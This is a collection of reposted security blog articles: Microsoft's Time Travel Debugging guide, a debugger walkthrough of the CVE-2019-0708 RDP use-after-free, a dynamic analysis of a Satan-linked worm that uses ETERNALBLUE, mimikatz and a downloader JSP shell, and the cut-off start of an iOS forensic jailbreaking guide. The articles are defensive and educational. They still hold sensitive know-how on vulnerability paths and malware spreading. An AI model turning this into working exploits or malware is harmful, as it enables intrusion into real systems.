18 years have passed since Cross-Site Scripting (XSS) has been identified as a web vulnerability class. Since then, numerous efforts have been proposed to detect, fix or mitigate it. We've seen vulnerability scanners, fuzzers, static & dynamic code analyzers, taint tracking engines, linters, and finally XSS filters, WAFs and all various flavours of Content Security Policy. Various libraries have been created to minimize or eliminate the risk of XSS: HTML sanitizers, templating libraries, sandboxing solutions - and yet XSS is still one of the most prevalent vulnerabilities plaguing web applications. It seems like, while we have a pretty good grasp on how to address stored & reflected XSS, "solving" DOM XSS remains an open question. DOM XSS is caused by ever-growing complexity of client-side JavaScript code (see script gadgets), but most importantly - the lack of security in DOM API design. But perhaps we have a chance this time? Trusted Types is a new browser API that allows a web application to limit its interaction with the DOM, with the goal of obliterating DOM XSS. Based on the battle-tested design that prevents XSS in most of the Google web applications, Trusted Types add the DOM XSS prevention API to the browsers. Trusted Types allow to isolate the application components that may potentially introduce DOM XSS into tiny, reviewable pieces, and guarantee that the rest of the code is DOM-XSS free. They can also leverage existing solutions like autoescaping templating libraries, or client-side sanitizers to use them as building blocks of a secure application. Trusted Types have a working polyfill, an implementation in Chrome and integrate well with existing JS frameworks and libraries. Oddly similar to both XSS filters and CSP, they are also fundamentally different, and in our opinion have a reasonable chance of eliminating DOM XSS - once and for all.
-
Time travel debugging: It’s a blast! (from the past) swiat May 29, 20190 The Microsoft Security Response Center (MSRC) works to assess vulnerabilities that are externally reported to us as quickly as possible, but time can be lost if we have to confirm details of the repro steps or environment with the researcher to reproduce the vulnerability. Microsoft has made our “Time Travel Debugging” (TTD) tool publicly available to make it easy for security researchers to provide full repro, shortening investigations and potentially contributing to higher bounties (see “Report quality definitions for Microsoft’s Bug Bounty programs”). We use it internally, too—it has allowed us to find root cause for complex software issues in half the time it would take with a regular debugger. If you’re wondering where you can get the TTD tool and how to use it, this blogpost is for you. Understanding time travel debugging Whether you call it “Timeless debugging”, “record-replay debugging”, “reverse-debugging”, or “time travel debugging”, it’s the same idea: the ability to record the execution of a program. Once you have this recording, you can navigate forward or backward, and you can share with colleagues. Even better, an execution trace is a deterministic recording; everybody looking at it sees the same behavior at the same time. When a developer receives a TTD trace, they do not even need to reproduce the issue to travel in the execution trace, they can just navigate through the trace file. There are usually three key components associated to time travel debugging: A recorder that you can picture as a video camera, A trace file that you can picture as the recording file generated by the camera, A replayer that you can picture as a movie player. Good ol’ debuggers Debuggers aren’t new, and the process of debugging an issue has not drastically changed for decades. The process typically works like this: Observing the behavior under a debugger. In this step, you recreate an environment like that of the finder of the bug. It can be as easy as running a simple proof-of-concept program on your machine and observing a bug-check, or it can be as complex as setting up an entire infrastructure with specific software configurations just to be able to exercise the code at fault. And that’s if the bug report is accurate and detailed enough to properly set up the environment. Understanding why the issue happened. This is where the debugger comes in. What you expect of a debugger regardless of architectures and platforms is to be able to precisely control the execution of your target (stepping-over, stepping-in at various granularity level: instruction, source-code line), setting breakpoints, editing the memory as well as editing the processor context. This basic set of features enables you to get the job done. The cost is usually high though. A lot of reproducing the issue over and over, a lot of stepping-in and a lot of “Oops... I should not have stepped-over, let’s restart”. Wasteful and inefficient. Whether you’re the researcher reporting a vulnerability or a member of the team confirming it, Time Travel Debugging can help the investigation to go quickly and with minimal back and forth to confirm details. High-level overview The technology that Microsoft has developed is called “TTD” for time-travel debugging. Born out of Microsoft Research around 2006 (cf “Framework for Instruction-level Tracing and Analysis of Program Executions”) it was later improved and productized by Microsoft’s debugging team. The project relies on code-emulation to record every event necessary that replay will need to reproduce the exact same execution. The exact same sequence of instructions with the exact same inputs and outputs. The data that the emulator tracks include memory reads, register values, thread creation, module loads, etc. Recording / Replaying The recording software CPU, TTDRecordCPU.dll, is injected into the target process and hijacks the control flow of the threads. The emulator decodes native instructions into an internal custom intermediate language (modeled after simple RISC instructions), caches block, and executes them. From now on, it carries the execution of those threads forward and dispatches callbacks whenever an event happens such as: , when an instruction has been translated, etc. Those callbacks allow the trace file writer component to collect information needed for the software CPU to replay the execution based off the trace file. The replay software CPU, TTDReplayCPU.dll shares most of the same codebase than the record CPU, except that instead of reading the target memory it loads data directly from the trace file. This allows you to replay with full fidelity the execution of a program without needing to run the program. The trace file The trace file is a regular file on your file system that ends with the ‘run’ extension. The file uses a custom file format and compression to optimize the file size. You can also view this file as a database filled with rich information. To access information that the debugger requires very fast, the “WinDbg Preview” creates an index file the first time you open a trace file. It usually takes a few minutes to create. Usually, this index is about one to two times as large as the original trace file. As an example, a tracing of the program ping.exe on my machine generates a trace file of 37MB and an index file of 41MB. There are about 1,973,647 instructions (about 132 bits per instruction). Note that, in this instance, the trace file is so small that the internal structures of the trace file accounts for most of the space overhead. A larger execution trace usually contains about 1 to 2 bits per instruction. Recording a trace with WinDbg Preview Now that you’re familiar with the pieces of TTD, here’s how to use them. Get TTD: TTD is currently available on Windows 10 through the “WinDbg Preview” app that you can find in the Microsoft store: https://www.microsoft.com/en-us/p/windbg-preview/9pgjgd53tn86?activetab=pivot:overviewtab. Once you install the application the “Time Travel Debugging - Record a trace” tutorial will walk you through recording your first execution trace. Building automations with TTD A recent improvement to the Windows debugger is the addition of the debugger data model and the ability to interact with it via JavaScript (as well as C++). The details of the data model are out of scope for this blog, but you can think of it as a way to both consume and expose structured data to the user and debugger extensions. TTD extends the data model by introducing very powerful and unique features available under both the @$cursession.TTD and @$curprocess.TTD nodes. TTD.Calls is a function that allows you to answers questions like “Give me every position where foo!bar has been invoked” or “Is there a call to foo!bar that returned 10 in the trace”. Better yet, like every collection in the data-model, you can query them with LINQ operators. Here is what a TTD.Calls object look like: 0:000> dx @$cursession.TTD.Calls("msvcrt!write").First() @$cursession.TTD.Calls("msvcrt!write").First() EventType : Call ThreadId : 0x194 UniqueThreadId : 0x2 TimeStart : 1310:A81 [Time Travel] TimeEnd : 1345:14 [Time Travel] Function : msvcrt!_write FunctionAddress : 0x7ffec9bbfb50 ReturnAddress : 0x7ffec9be74a2 ReturnValue : 401 Parameters The API completely hides away ISA specific details, so you can build queries that are architecture independent. TTD.Calls: Reconstructing stdout To demo how powerful and easy it is to leverage these features, we record the execution of “ping.exe 127.0.0.1” and from the recording rebuild the console output. Building this in JavaScript is very easy: Iterate over every call to msvcrt!write ordered by the time position, Read several bytes (the amount is in the third argument) pointed by the second argument, Display the accumulated results. 'use strict'; function initializeScript() { return [new host.apiVersionSupport(1, 3)]; } function invokeScript() { const logln = p => host.diagnostics.debugLog(p + '\n'); const CurrentSession = host.currentSession; const Memory = host.memory; const Bytes = []; for(const Call of CurrentSession.TTD.Calls('msvcrt!write').OrderBy(p => p.TimeStart)) { Call.TimeStart.SeekTo(); const [_, Address, Count] = Call.Parameters; Bytes.push(...Memory.readMemoryValues(Address, Count, 1)); } logln(Bytes.filter(p => p != 0).map( p => String.fromCharCode(p) ).join('')); } TTD.Memory: Finding every thread that touched the LastErrorValue TTD.Memory is a powerful API that allows you to query the trace file for certain types (read, write, execute) of memory access over a range of memory. Every resulting object of a memory query looks like the sample below: 0:000> dx @$cursession.TTD.Memory(0x000007fffffde068, 0x000007fffffde070, "w").First() @$cursession.TTD.Memory(0x000007fffffde068, 0x000007fffffde070, "w").First() EventType : MemoryAccess ThreadId : 0xb10 UniqueThreadId : 0x2 TimeStart : 215:27 [Time Travel] TimeEnd : 215:27 [Time Travel] AccessType : Write IP : 0x76e6c8be Address : 0x7fffffde068 Size : 0x4 Value : 0x0 This result identifies the type of memory access done, the time stamp for start and finish, the thread accessing the memory, the memory address accessed, where it has been accessed and what value has been read/written/executed. To demonstrate its power, let’s create another script that collects the call-stack every time the application writes to the LastErrorValue in the current thread’s environment block: Iterate over every memory write access to &@$teb->LastErrorValue, Travel to the destination, dump the current call-stack, Display the results. 'use strict'; function initializeScript() { return [new host.apiVersionSupport(1, 3)]; } function invokeScript() { const logln = p => host.diagnostics.debugLog(p + '\n'); const CurrentThread = host.currentThread; const CurrentSession = host.currentSession; const Teb = CurrentThread.Environment.EnvironmentBlock; const LastErrorValueOffset = Teb.targetType.fields.LastErrorValue.offset; const LastErrorValueAddress = Teb.address.add(LastErrorValueOffset); const Callstacks = new Set(); for(const Access of CurrentSession.TTD.Memory( LastErrorValueAddress, LastErrorValueAddress.add(8), 'w' )) { Access.TimeStart.SeekTo(); const Callstack = Array.from(CurrentThread.Stack.Frames); Callstacks.add(Callstack); } for(const Callstack of Callstacks) { for(const [Idx, Frame] of Callstack.entries()) { logln(Idx + ': ' + Frame); } logln('----'); } } Note that there are more TTD specific objects you can use to get information related to events that happened in a trace, the lifetime of threads, so on. All of those are documented on the “Introduction to Time Travel Debugging objects” page. 0:000> dx @$curprocess.TTD.Lifetime @$curprocess.TTD.Lifetime : [F:0, 1F4B:0] MinPosition : F:0 [Time Travel] MaxPosition : 1F4B:0 [Time Travel] 0:000> dx @$curprocess.Threads.Select(p => p.TTD.Position) @$curprocess.Threads.Select(p => p.TTD.Position) [0x194] : 1E21:104 [Time Travel] [0x7e88] : 717:1 [Time Travel] [0x5fa4] : 723:1 [Time Travel] [0x176c] : B58:1 [Time Travel] [0x76a0] : 1938:1 [Time Travel] Wrapping up Time Travel Debugging is a powerful tool for security software engineers and can also be beneficial for malware analysis, vulnerability hunting, and performance analysis. We hope you found this introduction to TTD useful and encourage you to use it to create execution traces for the security issues that you are finding. The trace files generated by TTD compress very well; we recommend to use 7zip (usually shrinks the file to about 10% of the original size) before uploading it to your favorite file storage service. Axel Souchet Microsoft Security Response Center (MSRC) FAQ Can I edit memory during replay time? No. As the recorder only saves what is needed to replay a particular execution path in your program, it doesn’t save enough information to be able to re-simulate a different execution. Why don’t I see the bytes when a file is read? The recorder knows only what it has emulated. Which means that if another entity (the NT kernel here but it also could be another process writing into a shared memory section) writes data to memory, there is no way for the emulator to know about it. As a result, if the target program never reads those values back, they will never appear in the trace file. If they are read later, then their values will be available at that point when the emulator fetches the memory again. This is an area the team is planning on improving soon, so watch this space ?. Do I need private symbols or source code? You don’t need source code or private symbols to use TTD. The recorder consumes native code and doesn’t need anything extra to do its job. If private symbols and source codes are available, the debugger will consume them and provide the same experience as when debugging with source / symbols. Can I record kernel-mode execution? TTD is for user-mode execution only. Does the recorder support self-modifying code? Yes, it does! Are there any known incompatibilities? There are some and you can read about them in “Things to look out for”. Do I need WinDbg Preview to record traces? Yes. As of today, the TTD recorder is shipping only as part of “WinDbg Preview” which is only downloadable from the Microsoft Store. References Time travel debugging Time Travel Debugging - Overview - https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/time-travel-debugging-overview Time Travel Debugging: Root Causing Bugs in Commercial Scale Software -https://www.youtube.com/watch?v=l1YJTg_A914 Defrag Tools #185 - Time Travel Debugging – Introduction - https://channel9.msdn.com/Shows/Defrag-Tools/Defrag-Tools-185-Time-Travel-Debugging-Introduction Defrag Tools #186 - Time Travel Debugging – Advanced - https://channel9.msdn.com/Shows/Defrag-Tools/Defrag-Tools-186-Time-Travel-Debugging-Advanced Time Travel Debugging and Queries – https://github.com/Microsoft/WinDbg-Samples/blob/master/TTDQueries/tutorial-instructions.md Framework for Instruction-level Tracing and Analysis of Program Executions - https://www.usenix.org/legacy/events/vee06/full_papers/p154-bhansali.pdf VulnScan – Automated Triage and Root Cause Analysis of Memory Corruption Issues - https://blogs.technet.microsoft.com/srd/2017/10/03/vulnscan-automated-triage-and-root-cause-analysis-of-memory-corruption-issues/ What’s new in WinDbg Preview - https://mybuild.techcommunity.microsoft.com/sessions/77266 Javascript / WinDbg / Data model WinDbg Javascript examples - https://github.com/Microsoft/WinDbg-Samples Introduction to Time Travel Debugging objects - https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/time-travel-debugging-object-model WinDbg Preview - Data Model - https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/windbg-data-model-preview Sursa: https://blogs.technet.microsoft.com/srd/2019/05/29/time-travel-debugging-its-a-blast-from-the-past/
-
A Debugging Primer with CVE-2019–0708 Bruce LeeFollow May 29 By: @straight_blast ; straightblast426@gmail.com The purpose of this post is to share how one would use a debugger to identify the relevant code path that can trigger the crash. I hope this post will be educational to people that are excited to learning how to use debugger for vulnerability analysis. This post will not visit details on RDP communication basics and MS_T120. Interested readers should refer to the following blogs that sum up the need to know basis: CVE-2019-0708: A Comprehensive Analysis of a Remote Desktop Services Vulnerability In the May 2019 patch cycle, Microsoft released a patch for a remote code execution bug in their Remote Desktop…www.zerodayinitiative.com RDP Stands for "Really DO Patch!" - Understanding the Wormable RDP Vulnerability CVE-2019-0708 |… During Microsoft's May Patch Tuesday cycle, a security advisory was released for a vulnerability in the Remote Desktop…securingtomorrow.mcafee.com Furthermore, no PoC code will be provided in this post, as the purpose is to show vulnerability analysis with a debugger. The target machine (debuggee) will be a Windows 7 x64 and the debugger machine will be a Windows 10 x64. Both the debugger and debuggee will run within VirtualBox. Setting up the kernel debugging environment with VirtualBox On the target machine, run cmd.exe with administrative privilege. Use the bcdedit command to enable kernel debugging. bcdedit /set {current} debug yes bcdedit /set {current} debugtype serial bcdedit /set {current} debugport 1 bcdedit /set {current} baudrate 115200 bcdedit /set {current} description "Windows 7 with kernel debug via COM" When you type bcdedit again, something similar to the following screenshot should display: 2. Shutdown the target machine (debuggee) and right click on the target image in the VirtualBox Manager. Select “Settings” and then “Serial Ports”. Copy the settings as illustrated in the following image and click “OK”: 3. Right click on the image that will host the debugger, and go to the “Serial Ports” setting and copy the settings as shown and click “OK”: 4. Keep the debuggee VM shutdown, and boot up the debugger VM. On the debugger VM, download and install WinDBG. I will be using the WinDBG Preview edition. Download Debugging Tools for Windows - WinDbg - Windows drivers This page provides downloads for the Windows Debugging tools, such as WinDbg.docs.microsoft.com 5. Once the debugger is installed, select “Attach to kernel”, set the “Baud Rate” to “115200" and “Port” to “com1”. Click on the “initial break” as well. Click “OK” and the debugger is now ready to attach to the debuggee. 6. Fire up the target “debuggee” machine, and the following prompt will be displayed. Select the one with “debugger enabled” and proceed. On the debugger end, the WinDBG will have established a connection with the debuggee. It is going to require a few manual enter of “g” into the “debugger command prompt” to have the debuggee completely loaded up. Also, because the debugging action is handled through “com”, the initial start up will take a bit of time. 7. Once the debuggee is loaded, fire up “cmd.exe” and type “netstat -ano”. Locate the PID that runs port 3389, as following: 8. Go back to the debugger and click on “Home” -> “Break” to enable the debugger command prompt and type: !process 0 0 svchost.exe This will list a bunch of process that is associated with svchost.exe. We’re interested in the process that has PID 1216 (0x4C0). 9. We will now switch into the context of svchost.exe that runs RDP. In the debugger command prompt, type: .process /i /p fffffa80082b72a0 After the context switched, pause the debugger and run the command “.reload” to reload all the symbols that the process will use. Identifying the relevant code path Without repeating too much of the public information, the patched vulnerability have code changed in the IcaBindVirtualChannels. We know that if IcaFindChannelByName finds the string “MS_T120”, it calls IcaBindchannel such as: _IcaBindChannel(ChannelControlStructure*, 5, index, dontcare) The following screenshots depicts the relevant unpatched code in IcaBindVirtualChannels: We’re going to set two breakpoints. One will be on _IcaBindChannel where the channel control structure is stored into the channel pointer table. The index of where the channel control structure is stored is based on the index of where the Virtual Channel name is declared within the clientNetworkData of the MCS Initial Connect and GCC Create packet. and the other one on the “call _IcaBindChannel” within the IcaBindVirtualChannels. The purpose of these breakpoints areto observe the creation of virtual channels and the orders these channels are created. bp termdd!IcaBindChannel+0x55 ".printf \"rsi=%d and rbp=%d\\n\", rsi, rbp;dd rdi;.echo" bp termdd!IcaBindVirtualChannels+0x19e ".printf \"We got a MS_T120, r8=%d\\n\",r8;dd rcx;r $t0=rcx;.echo" The breakpoint first hits the following, with an index value of “31”: Listing the call stack with “kb” shows the following: We can see the IcaBindChannel is called from a IcaCreateChannel, which can be traced all the way to the rdpwsx!MSCreateDomain. If we take a look at that function under a disassembler, we noticed it is creating the MS_T120 channel: Also, but looking at the patched termdd.sys, we know that the patched code enforces the index for MS_T120 virtual channel to be 31, this first breakpoint indicates the first channel that gets created is the MS_T120 channel. The next breakpoint hit is the 2nd breakpoint (within the IcaBindVirtualChannel), followed by the 1st breakpoint (within IcaBindChannel) again: This gets hit as it observed the MS_T120 value from the clientNetworkData. If we compared the address and content displayed in above image with the one way, way above, we can see they’re identical. This means both are referring to the same channel control structure. However, the reference to this structure is being stored at two different locations: rsi = 31, rbp = 5; [rax + (31 + 5) * 8 + 0xe0] = MST_120_structure rsi = 1, rbp = 5; [rax + (1 + 5) * 8 + 0xe0] = MS_T120_structure In another words, there are two entries in the channel pointer table that have references to the MS_T120 structure. Afterwards, a few more channels are created which we don’t care about: index 7 with offset 5 index 0 with offset 0 and 1 index 0 with offset 3 and 4 The next step into finding other relevant code to look at will be to set a break read/write on the MS_T120 structure. It is with certain the MS_T120 structure will be ‘touch’ in the future. I set the break read/write breakpoint on the data within the red box, as shown in the following: As we proceed with the execution, we get calls to IcaDereferenceChannel, which we’re not interested in. Then, we hit termdd!IcaFindChannel, with some more information to look into from the call stack: The termdd!IcaChannelInput and termdd!IcaChannelInputInternal sounds like something that might process data sent to the virtual channel. A pro tip is to set breakpoint before a function call, to see if the registers or stacks (depending how data are passed to a function) could contain recognizable or readable data. I will set a breakpoint on the call to IcaChannelInputInternal, within the IcaChannelInput function: bp termdd!IcaChannelInput+0xd8 We’re interested in calls to the IcaChannelInput breakpoint after IcaBindVirtualChannels has been called. From the above image, just right before the call to IcaChannelInputInternal, the rax register holds an address that references to the “A”s I passed over as data through the virtual channel. I will now set another set of break on read/write on the “A”s to see what code will ‘touch’ them. ba r8 rax+0xa The reason I had to add 0xA to the rax register is because the break on read/write requires an align address (ends in0x0 or 0x8 for x64 env) So the “A”s are now being worked in a “memmove” function. Looking at the call stack, the “memmove” is called from the “IcaCopyDataToUserBuffer”. Lets step out (gu) of the “memmove” to see where is the destination address that the “A”s are moving to. Which is here looking at it from the disassembler: The values for “Src”, “Dst” and “Size” are as follow: Src Dst Size (0x20) So the “memmove” copy “A”s from an kernel’s address space into a user’s address space. We will now set another groups of break on read/write on the user’s address space to see how these values are ‘touched’ ba r8 00000000`030ec590 ba r8 00000000`030ec598 ba r8 00000000`030ec5a0 ba r8 00000000`030ec5a8 (side note: If you get a message “Too many data breakpoints for processor 0…”, remove some of the older breakpoints you set then enter “g” again) We then get a hit on rdpwsx!IoThreadFunc: The breakpoint touched the memory section in the highlighted red box: The rdpwsx!IoThreadFunc appears to be the code that parses and handle the MS_T120 data content. Using a disassembler will provide a greater view: We will now use “p” command to step over each instruction. It looks like because I supplied ‘AAAA’, it took a different path. According to the blog post from ZDI, we need to send crafted data to the MS_T120 channel (over our selected index), so it will terminate the channel (free the MS_T120 channel control structure), such that when the RDPWD!SignalBrokenConnection tries to reach out to the MS_T120 channel again over index 31 from the channel pointer structure, it will Use a Freed MS_T120 channel control structure, leading to the crash. Based on the rdpwsx!IoThreadFunc, it appears to make sense to create crafted data that will hit the IcaChannelClose function. When the crafted data is correct, it will hit the rdpwsx!IcaChannelClose Before stepping through the IcaChannelClose, lets set a breakpoint on the MS_T120 control channel structure to see how does it get affected fffffa80`074fcac0 is the current address for the MS_T120 structure A breakpoint read is hit on fffffa80`074fcac0 The following picture shows the call stack when the breakpoint read is hit. A call is made to ExFreePoolWithTag, which frees the MS_T120 channel control structure. We can proceed with “g” until we hit the breakpoint in termdd!IcaChannelInput: Taking a look at the address that holds the MS_T120 channel control structure, the content looks pretty different. Furthermore, the call stack shows the call to IcaChannelInput comes from RDPWD!SignalBrokenConnection. The ZDI blog noted this function gets called when the connection terminates. We will use “t” command to step into the IcaChannelInputInternal function. Once we’re inside the function, we will set a new breakpoint: bp termdd!IcaFindChannel Once we’re inside the IcaFindChannel function, use “gu” to step out of it to return back to the IcaChannelInputInternal function: The MS_T120 object address is different to other MS_T120 object shown above, as these images are taken aross different debugging session The rax registers holds the reference to the freed MS_T120 control channel structure. As we continue to step through the code, the address at MS_T120+0x18 is being used as an parameter (rcx) to the ExEnterCriticalRegionAndAcquireResourceExclusive function. Lets take a look at rcx: And there we go, if we dereference rcx, it is nothing! So lets step over ExEnterCriticalRegionAndAcquireResourceExclusive and see the result: Bruce Lee Sursa: https://medium.com/@straightblast426/a-debugging-primer-with-cve-2019-0708-ccfa266682f6
-
Dynamic Analysis of a Windows Malicious Self-Propagating Binary SHARE: FACEBOOK TWITTER LINKEDIN May 29, 2019 by Adrian Hada Dynamic analysis (execution of malware in a controlled, supervised environment) is one of the most powerful tools in the arsenal of a malware analyst. However, it does come with its challenges. Attackers are aware that they might be watched, so we must take steps to ensure that the analysis machine (aka: sandbox) is invisible to the binary under analysis. Also, since we are granting a piece of malware CPU time, it can use it to further the threat actor’s intent. In this blog post, I will walk you through the analysis of one such binary. The malware at hand infects a computer, steals some local information and then proceeds to identify vulnerable targets on the local network and in the greater internet. Once a target has been found, it attempts to deliver malware on that machine. Such self-propagating malware has been in the news a lot in the past couple of years because of WannaCry, Mirai and other threats exhibiting this behavior. However, this technique is not limited to these families of malware – self-propagation has been around since the Morris worm of the late ‘80s – and we expect it to be used more and more. This raises a dilemma for those analyzing malware – by not limiting the things malware does, we’re granting them useful CPU cycles. By limiting them, we are unable to completely analyze the malware to determine all of its capabilities. AN INTERESTING TARGET The sample at hand is a Windows binary with SHA256 54a1d78c1734fa791c4ca2f8c62a4f0677cb764ed8b21e198e0934888a735ef8 that we detected in May. Figure 1 - Basic information for binary The first things that stand out are its large size – 2.6MB – and the fact that it was compressed using PECompact2. PECompact is an application that is able to reduce the size of a given binary and, with the correct plugins, can also offer reverse-engineering protection. This is probably an attempt on the attacker’s part to make the binary smaller (faster and less conspicuous delivery) and cause trouble for antivirus products to detect. A quick search on VirusTotal shows that this is not the case – 49 out of the 71 detection engines detect it as malicious. Some of the detection names point to The Shadow Brokers, Equation Groupand WannaCry. Community information also points to mimikatz, a tool used to steal interesting security tokens from Windows memory after an attacker has established a foothold. Figure 2 - Detections pointing to known threats and leaks LOCAL EXECUTION When executed, the malicious binary drops multiple files on the Windows system. One of these is a version of mimikatz, as mentioned above, dropped under the name “C:\Users\All Users\mmkt.exe”. This file is executed and drops a series of files to the local file system containing interesting system tokens: C:\ProgramData\uname C:\Users\All users\uname C:\ProgramData\upass C:\Users\All users\upass Other dropped files include some necessary DLL files as well as six other interesting files: two executables, two XML files and two files with the extension “.fb”, all to the folder C:\ProgramData: Blue.exe Blue.xml Blue.fb Star.exe Star.xml Star.fb The 6 files belong to the exploitation toolkit known as FuzzBunch, part of the ShadowBrokers dump, and are required to execute the exploit known as ETERNALBLUE and the DOUBLEPULSAR backdoor that could be deployed using the exploit. The pair has been used in attacks extensively since the dump and WannaCry came out – see the ATI team blogpost on WannaCry as well as another blogpost on other threats exploiting this in the wild after the leak came out. Although the exploits in the ShadowBrokers dump have been around for quite some time, our 2019 Security Report clearly points out that exploitation attempts for vulnerable targets are alive and kicking. Figure 3 - EternalBlue files from original dump The XML and .fb files are identical to the ones from the original ShadowBrokers leak. Figure 4 - EternalBlue-2.2.0.fb from ShadowBrokers dump Figure 5 - blue.fb from the sample analysis It becomes clear that this sample is intent upon spreading as far as possible. It’s time to look at the network traffic involved to identify what it is doing. NETWORK TRAFFIC Analyzing the network capture with Wireshark, we see a lot of different contacted endpoints: Figure 6 - Extract from the list of IP addresses contacted by the sample The first two servers belong to Microsoft and Akamai and are clean traffic, Windows-related. Then comes the malware traffic itself – one to an IP address in Malaysia, probably command and control (C&C) traffic, the rest targeting consecutive IP addresses in China, part of the worming behavior. Up next, a long list of private IP addresses with little traffic – failed scans since these hosts did not exist in our local network. Note that our sandbox isn’t configured with the 192.168.0.0 network address, so it seems that the sample doesn’t rely solely on the existing interfaces but also on a hard-coded network range to be scanned. The sample scans for an impressive number of open ports on the hosts in both the local network and in the greater Internet. The ports attempted seem to be the same for both types of hosts. Figure 7 - Extract from the ports scanned for one LAN IP Interesting ports that seem to be targeted include SSH, RDP, SMB, HTTP and many others. Figure 8 - Unsuccessful attempts to connect to RDP and SMB on hosts COMMAND AND CONTROL TRAFFIC The sample connects to an IP address in Malaysia for C&C, first sending a login request. Figure 9 - C&C check-in The request comes with a “hash” and a “url” parameter, both of which are hex strings. The “hash” parameter is likely used to identify the host. The “url” parameter is a string that was Base64 encoded and then hex-encoded. Decoding it reveals that the malware is checking in the Administrator credentials that were stolen using Mimikatz. Figure 10 - Decoding checked in data – URL parameter Then comes another request that returns the beginning of an internet IP address range to try to spread to: Figure 11 - Receiving a target IP range to exploit from C&C From this point on, the malware starts scanning said network address. It periodically checks in interesting information to the C&C server – for example, after it’s identified a server that is up, it checks in the location data – where to find the web server and what the title page is. Figure 12 - Sending data on discovering network host up Figure 13 - Decoding URL parameter, letting the C&C server know of discovered web server Figure 14 - Decoding Title parameter, which sends the page title of the web server response EXPLOITATION AND POST-EXPLOITATION The binary attempts different exploit methods depending on open ports. For HTTP, for example, it attempts to access different pages – most to check if a vulnerability exists, but some of them with overt RCE attempts. One such example, an exploit against ThinkPHP that Sucuri previously reported as being used in-the-wild. Figure 15 - ThinkPHP Exploit Attempt There is a minor difference in the payload than what Sucuri has reported – this attacker attempts to execute “netstat -an” on the machine to get network info, in the Sucuri report “uname” is used as an RCE test instead. Our honeypots have detected the Sucuri payload every day, so it seems that the attempts come from different attackers targeting the same exploit. Another complete exploit comes for the Apache Tomcat platform, CVE-2017-12615. The attacker attempts to upload a snippet of piece of JSP code that they can then execute via GET request: Figure 16 - CVE-2017-12615 attempt to upload JSP code to server The name “satan.jsp” is a good hint of who this malware really is. In December of 2018, NSFocus blogged about the actors behind Satan ransomware using a self-replicating worm component that would then download ransomware or a cryptocoin miner onto the exploited machines. The reported exploitation methods include a list of web application vulnerabilities that are very similar to the sample at hand – the two ThinkPHP vulnerabilities seeming to be the only ones missing from the original report. The behavior they reported also include SSH bruteforcing, ETERNALBLUE and DOUBLEPULSAR against SMB-capable hosts. It seems that we have identified our threat actor. Figure 17 - JSP shell code that downloads a binary from a web server depending on platform The JSP code downloads an executable from the remote server, fast.exe, on Windows platforms, as well as a bash script on Linux platforms. It then executes the payload. The names involved in the script and JSP shell, “fast.exe”, “ft32”, “ft64”, “.loop” are similar to what NSFocus reported. Similar to the NSFocus report, the “ft*” and “fast.exe” are simple downloaders for the rest of the modules. “ft” contains a list of C&C servers to contact, in this case all of them in the same network range: Figure 18 - String view of the "ft32" source code, which shows hints of persistence using Cron as well as C&C IP addresses Paths towards all the different malware components to be downloaded are available – conn32 and conn64, cry32, cry64 and so on. Linux binaries are UPX-compressed and Windows ones us PECompact2. In short, on successful exploitation, the downloader module is installed on the machine and it, subsequently, tries to contact a C&C server, pull the different components on the box and then start spreading, encrypting, mining or a combination of them, depending upon the malware author’s will. For a more detailed analysis, check out the NSFocus report mentioned above. RESOLVING THE ETHICAL DILEMMA The execution of this malware in our sandbox was mostly unrestricted. As a result, we were able to observe C&C communications and create a good signature. However, this is just what the threat actor desires – people executing his malware to spread it further. As a result, we’ve taken some precautions to limit the maximum amount of damage that sandboxing such samples can do – for example, not using any URLs accessed by these samples for our web crawler since that might lead us to re-executing exploits against innocent websites. Unfortunately, these steps are not perfect as we’ll always have to find balance between how much we allow and limit. CONCLUSION This is an example of the work that goes about when identifying an interesting binary. The work is not limited to simply classifying the malicious behavior but comprises other things as well – identifying ways of detecting the malware via local or network means, correlating information with known sources to validate our research as well as improve the current public knowledge of threat actors and their tools, improving our crawling ability to discover threats as quickly as possible as well as, in this case, making sure that our products are able to use all of this intelligence. Analysis of this binary also revealed a few gaps in our honeypot tracking and exploit traffic simulation capabilities which we are actively working on – deploying honeypot improvements and creating new strikes. BreakingPoint customers already have access to most of the exploits identified during the analysis of this binary – strikes for ETERNALBLUE, Struts S2-045 and S2-047 and other vulnerabilities. ThreatARMOR and visibility customers with an ATI subscription benefit from these detections as well with C&C addresses now being identified and most of the exploits having been tracked by our honeypots for a good amount of time now. LEVERAGE SUBSCRIPTION SERVICE TO STAY AHEAD OF ATTACKS The Ixia BreakingPoint Application and Threat Intelligence (ATI) Subscription provides bi-weekly updates of the latest application protocols and attacks for use with Ixia platforms. Sursa: https://www.ixiacom.com/company/blog/dynamic-analysis-windows-malicious-self-propagating-binary
-
Step by Step Guide to iOS Jailbreaking and Physical Acquisition May 30th, 2019 by Oleg Afonin Unless you’re using GrayShift or Cellebrite services for iPhone extraction, jailbreaking is a required pre-requisite for physical acquisition. Physical access offers numerous benefits over other types of extraction; as a result, jailbreaking is in demand among experts and forensic specialists. The procedure of installing a jailbreak for the purpose of physical extraction is vastly different from jailbreaking for research or other purposes. In particular, forensic experts are struggling to keep devices offline in order to prevent data leaks, unwanted synchronization and issues with remote device management that may remotely block or erase the device. While there is no lack of jailbreaking guides and manuals for “general” jailbreaking, installing a jailbreak for the purpose of physical acquisition has multiple forensic implications and some important precautions. When performing forensic extraction of an iOS device, we recommend the following procedure. Prepare the device and perform logical extraction Enable Airplane mode on the device. This is required in order to isolate the device from wireless networks and cut off Internet connectivity. Verify that Wi-Fi, Bluetooth and Mobile Data toggles are all switched off. Recent versions of iOS allow keeping (or manually toggling) Wi-Fi and Bluetooth connectivity even after Airplane mode is activated. This allows iOS devices to keep connectivity with the Apple Watch, wireless headphones and other accessories. Since we don’t want any of that during the extraction, we’ll need to make sure all of these connectivity options are disabled. Unlock the device. Do not remove the passcode.While you could switch the device into Airplane mode without unlocking the phone, the rest of the process will require the device with its screen unlocked. While some jailbreaking and acquisition guides (including our own old guides) may recommend you to remove the passcode, don’t. Removing the passcode makes iOS erase certain types of data such as Apple Pay transactions, downloaded Exchange mail and some other bits and pieces. Do not remove the passcode. Pair the device to your computer by establishing trust (note: passcode required!)Since iOS 11, iOS devices require the passcode in order to establish pairing relationship with the computer. This means that you will require the passcode in order to pair the iPhone to your computer. Without pairing, you won’t be able to sideload the jailbreak IPA onto the phone. Make sure that your computer’s Wi-Fi is disabled. This required step is frequently forgotten, resulting in a failed extraction.While it is not immediately 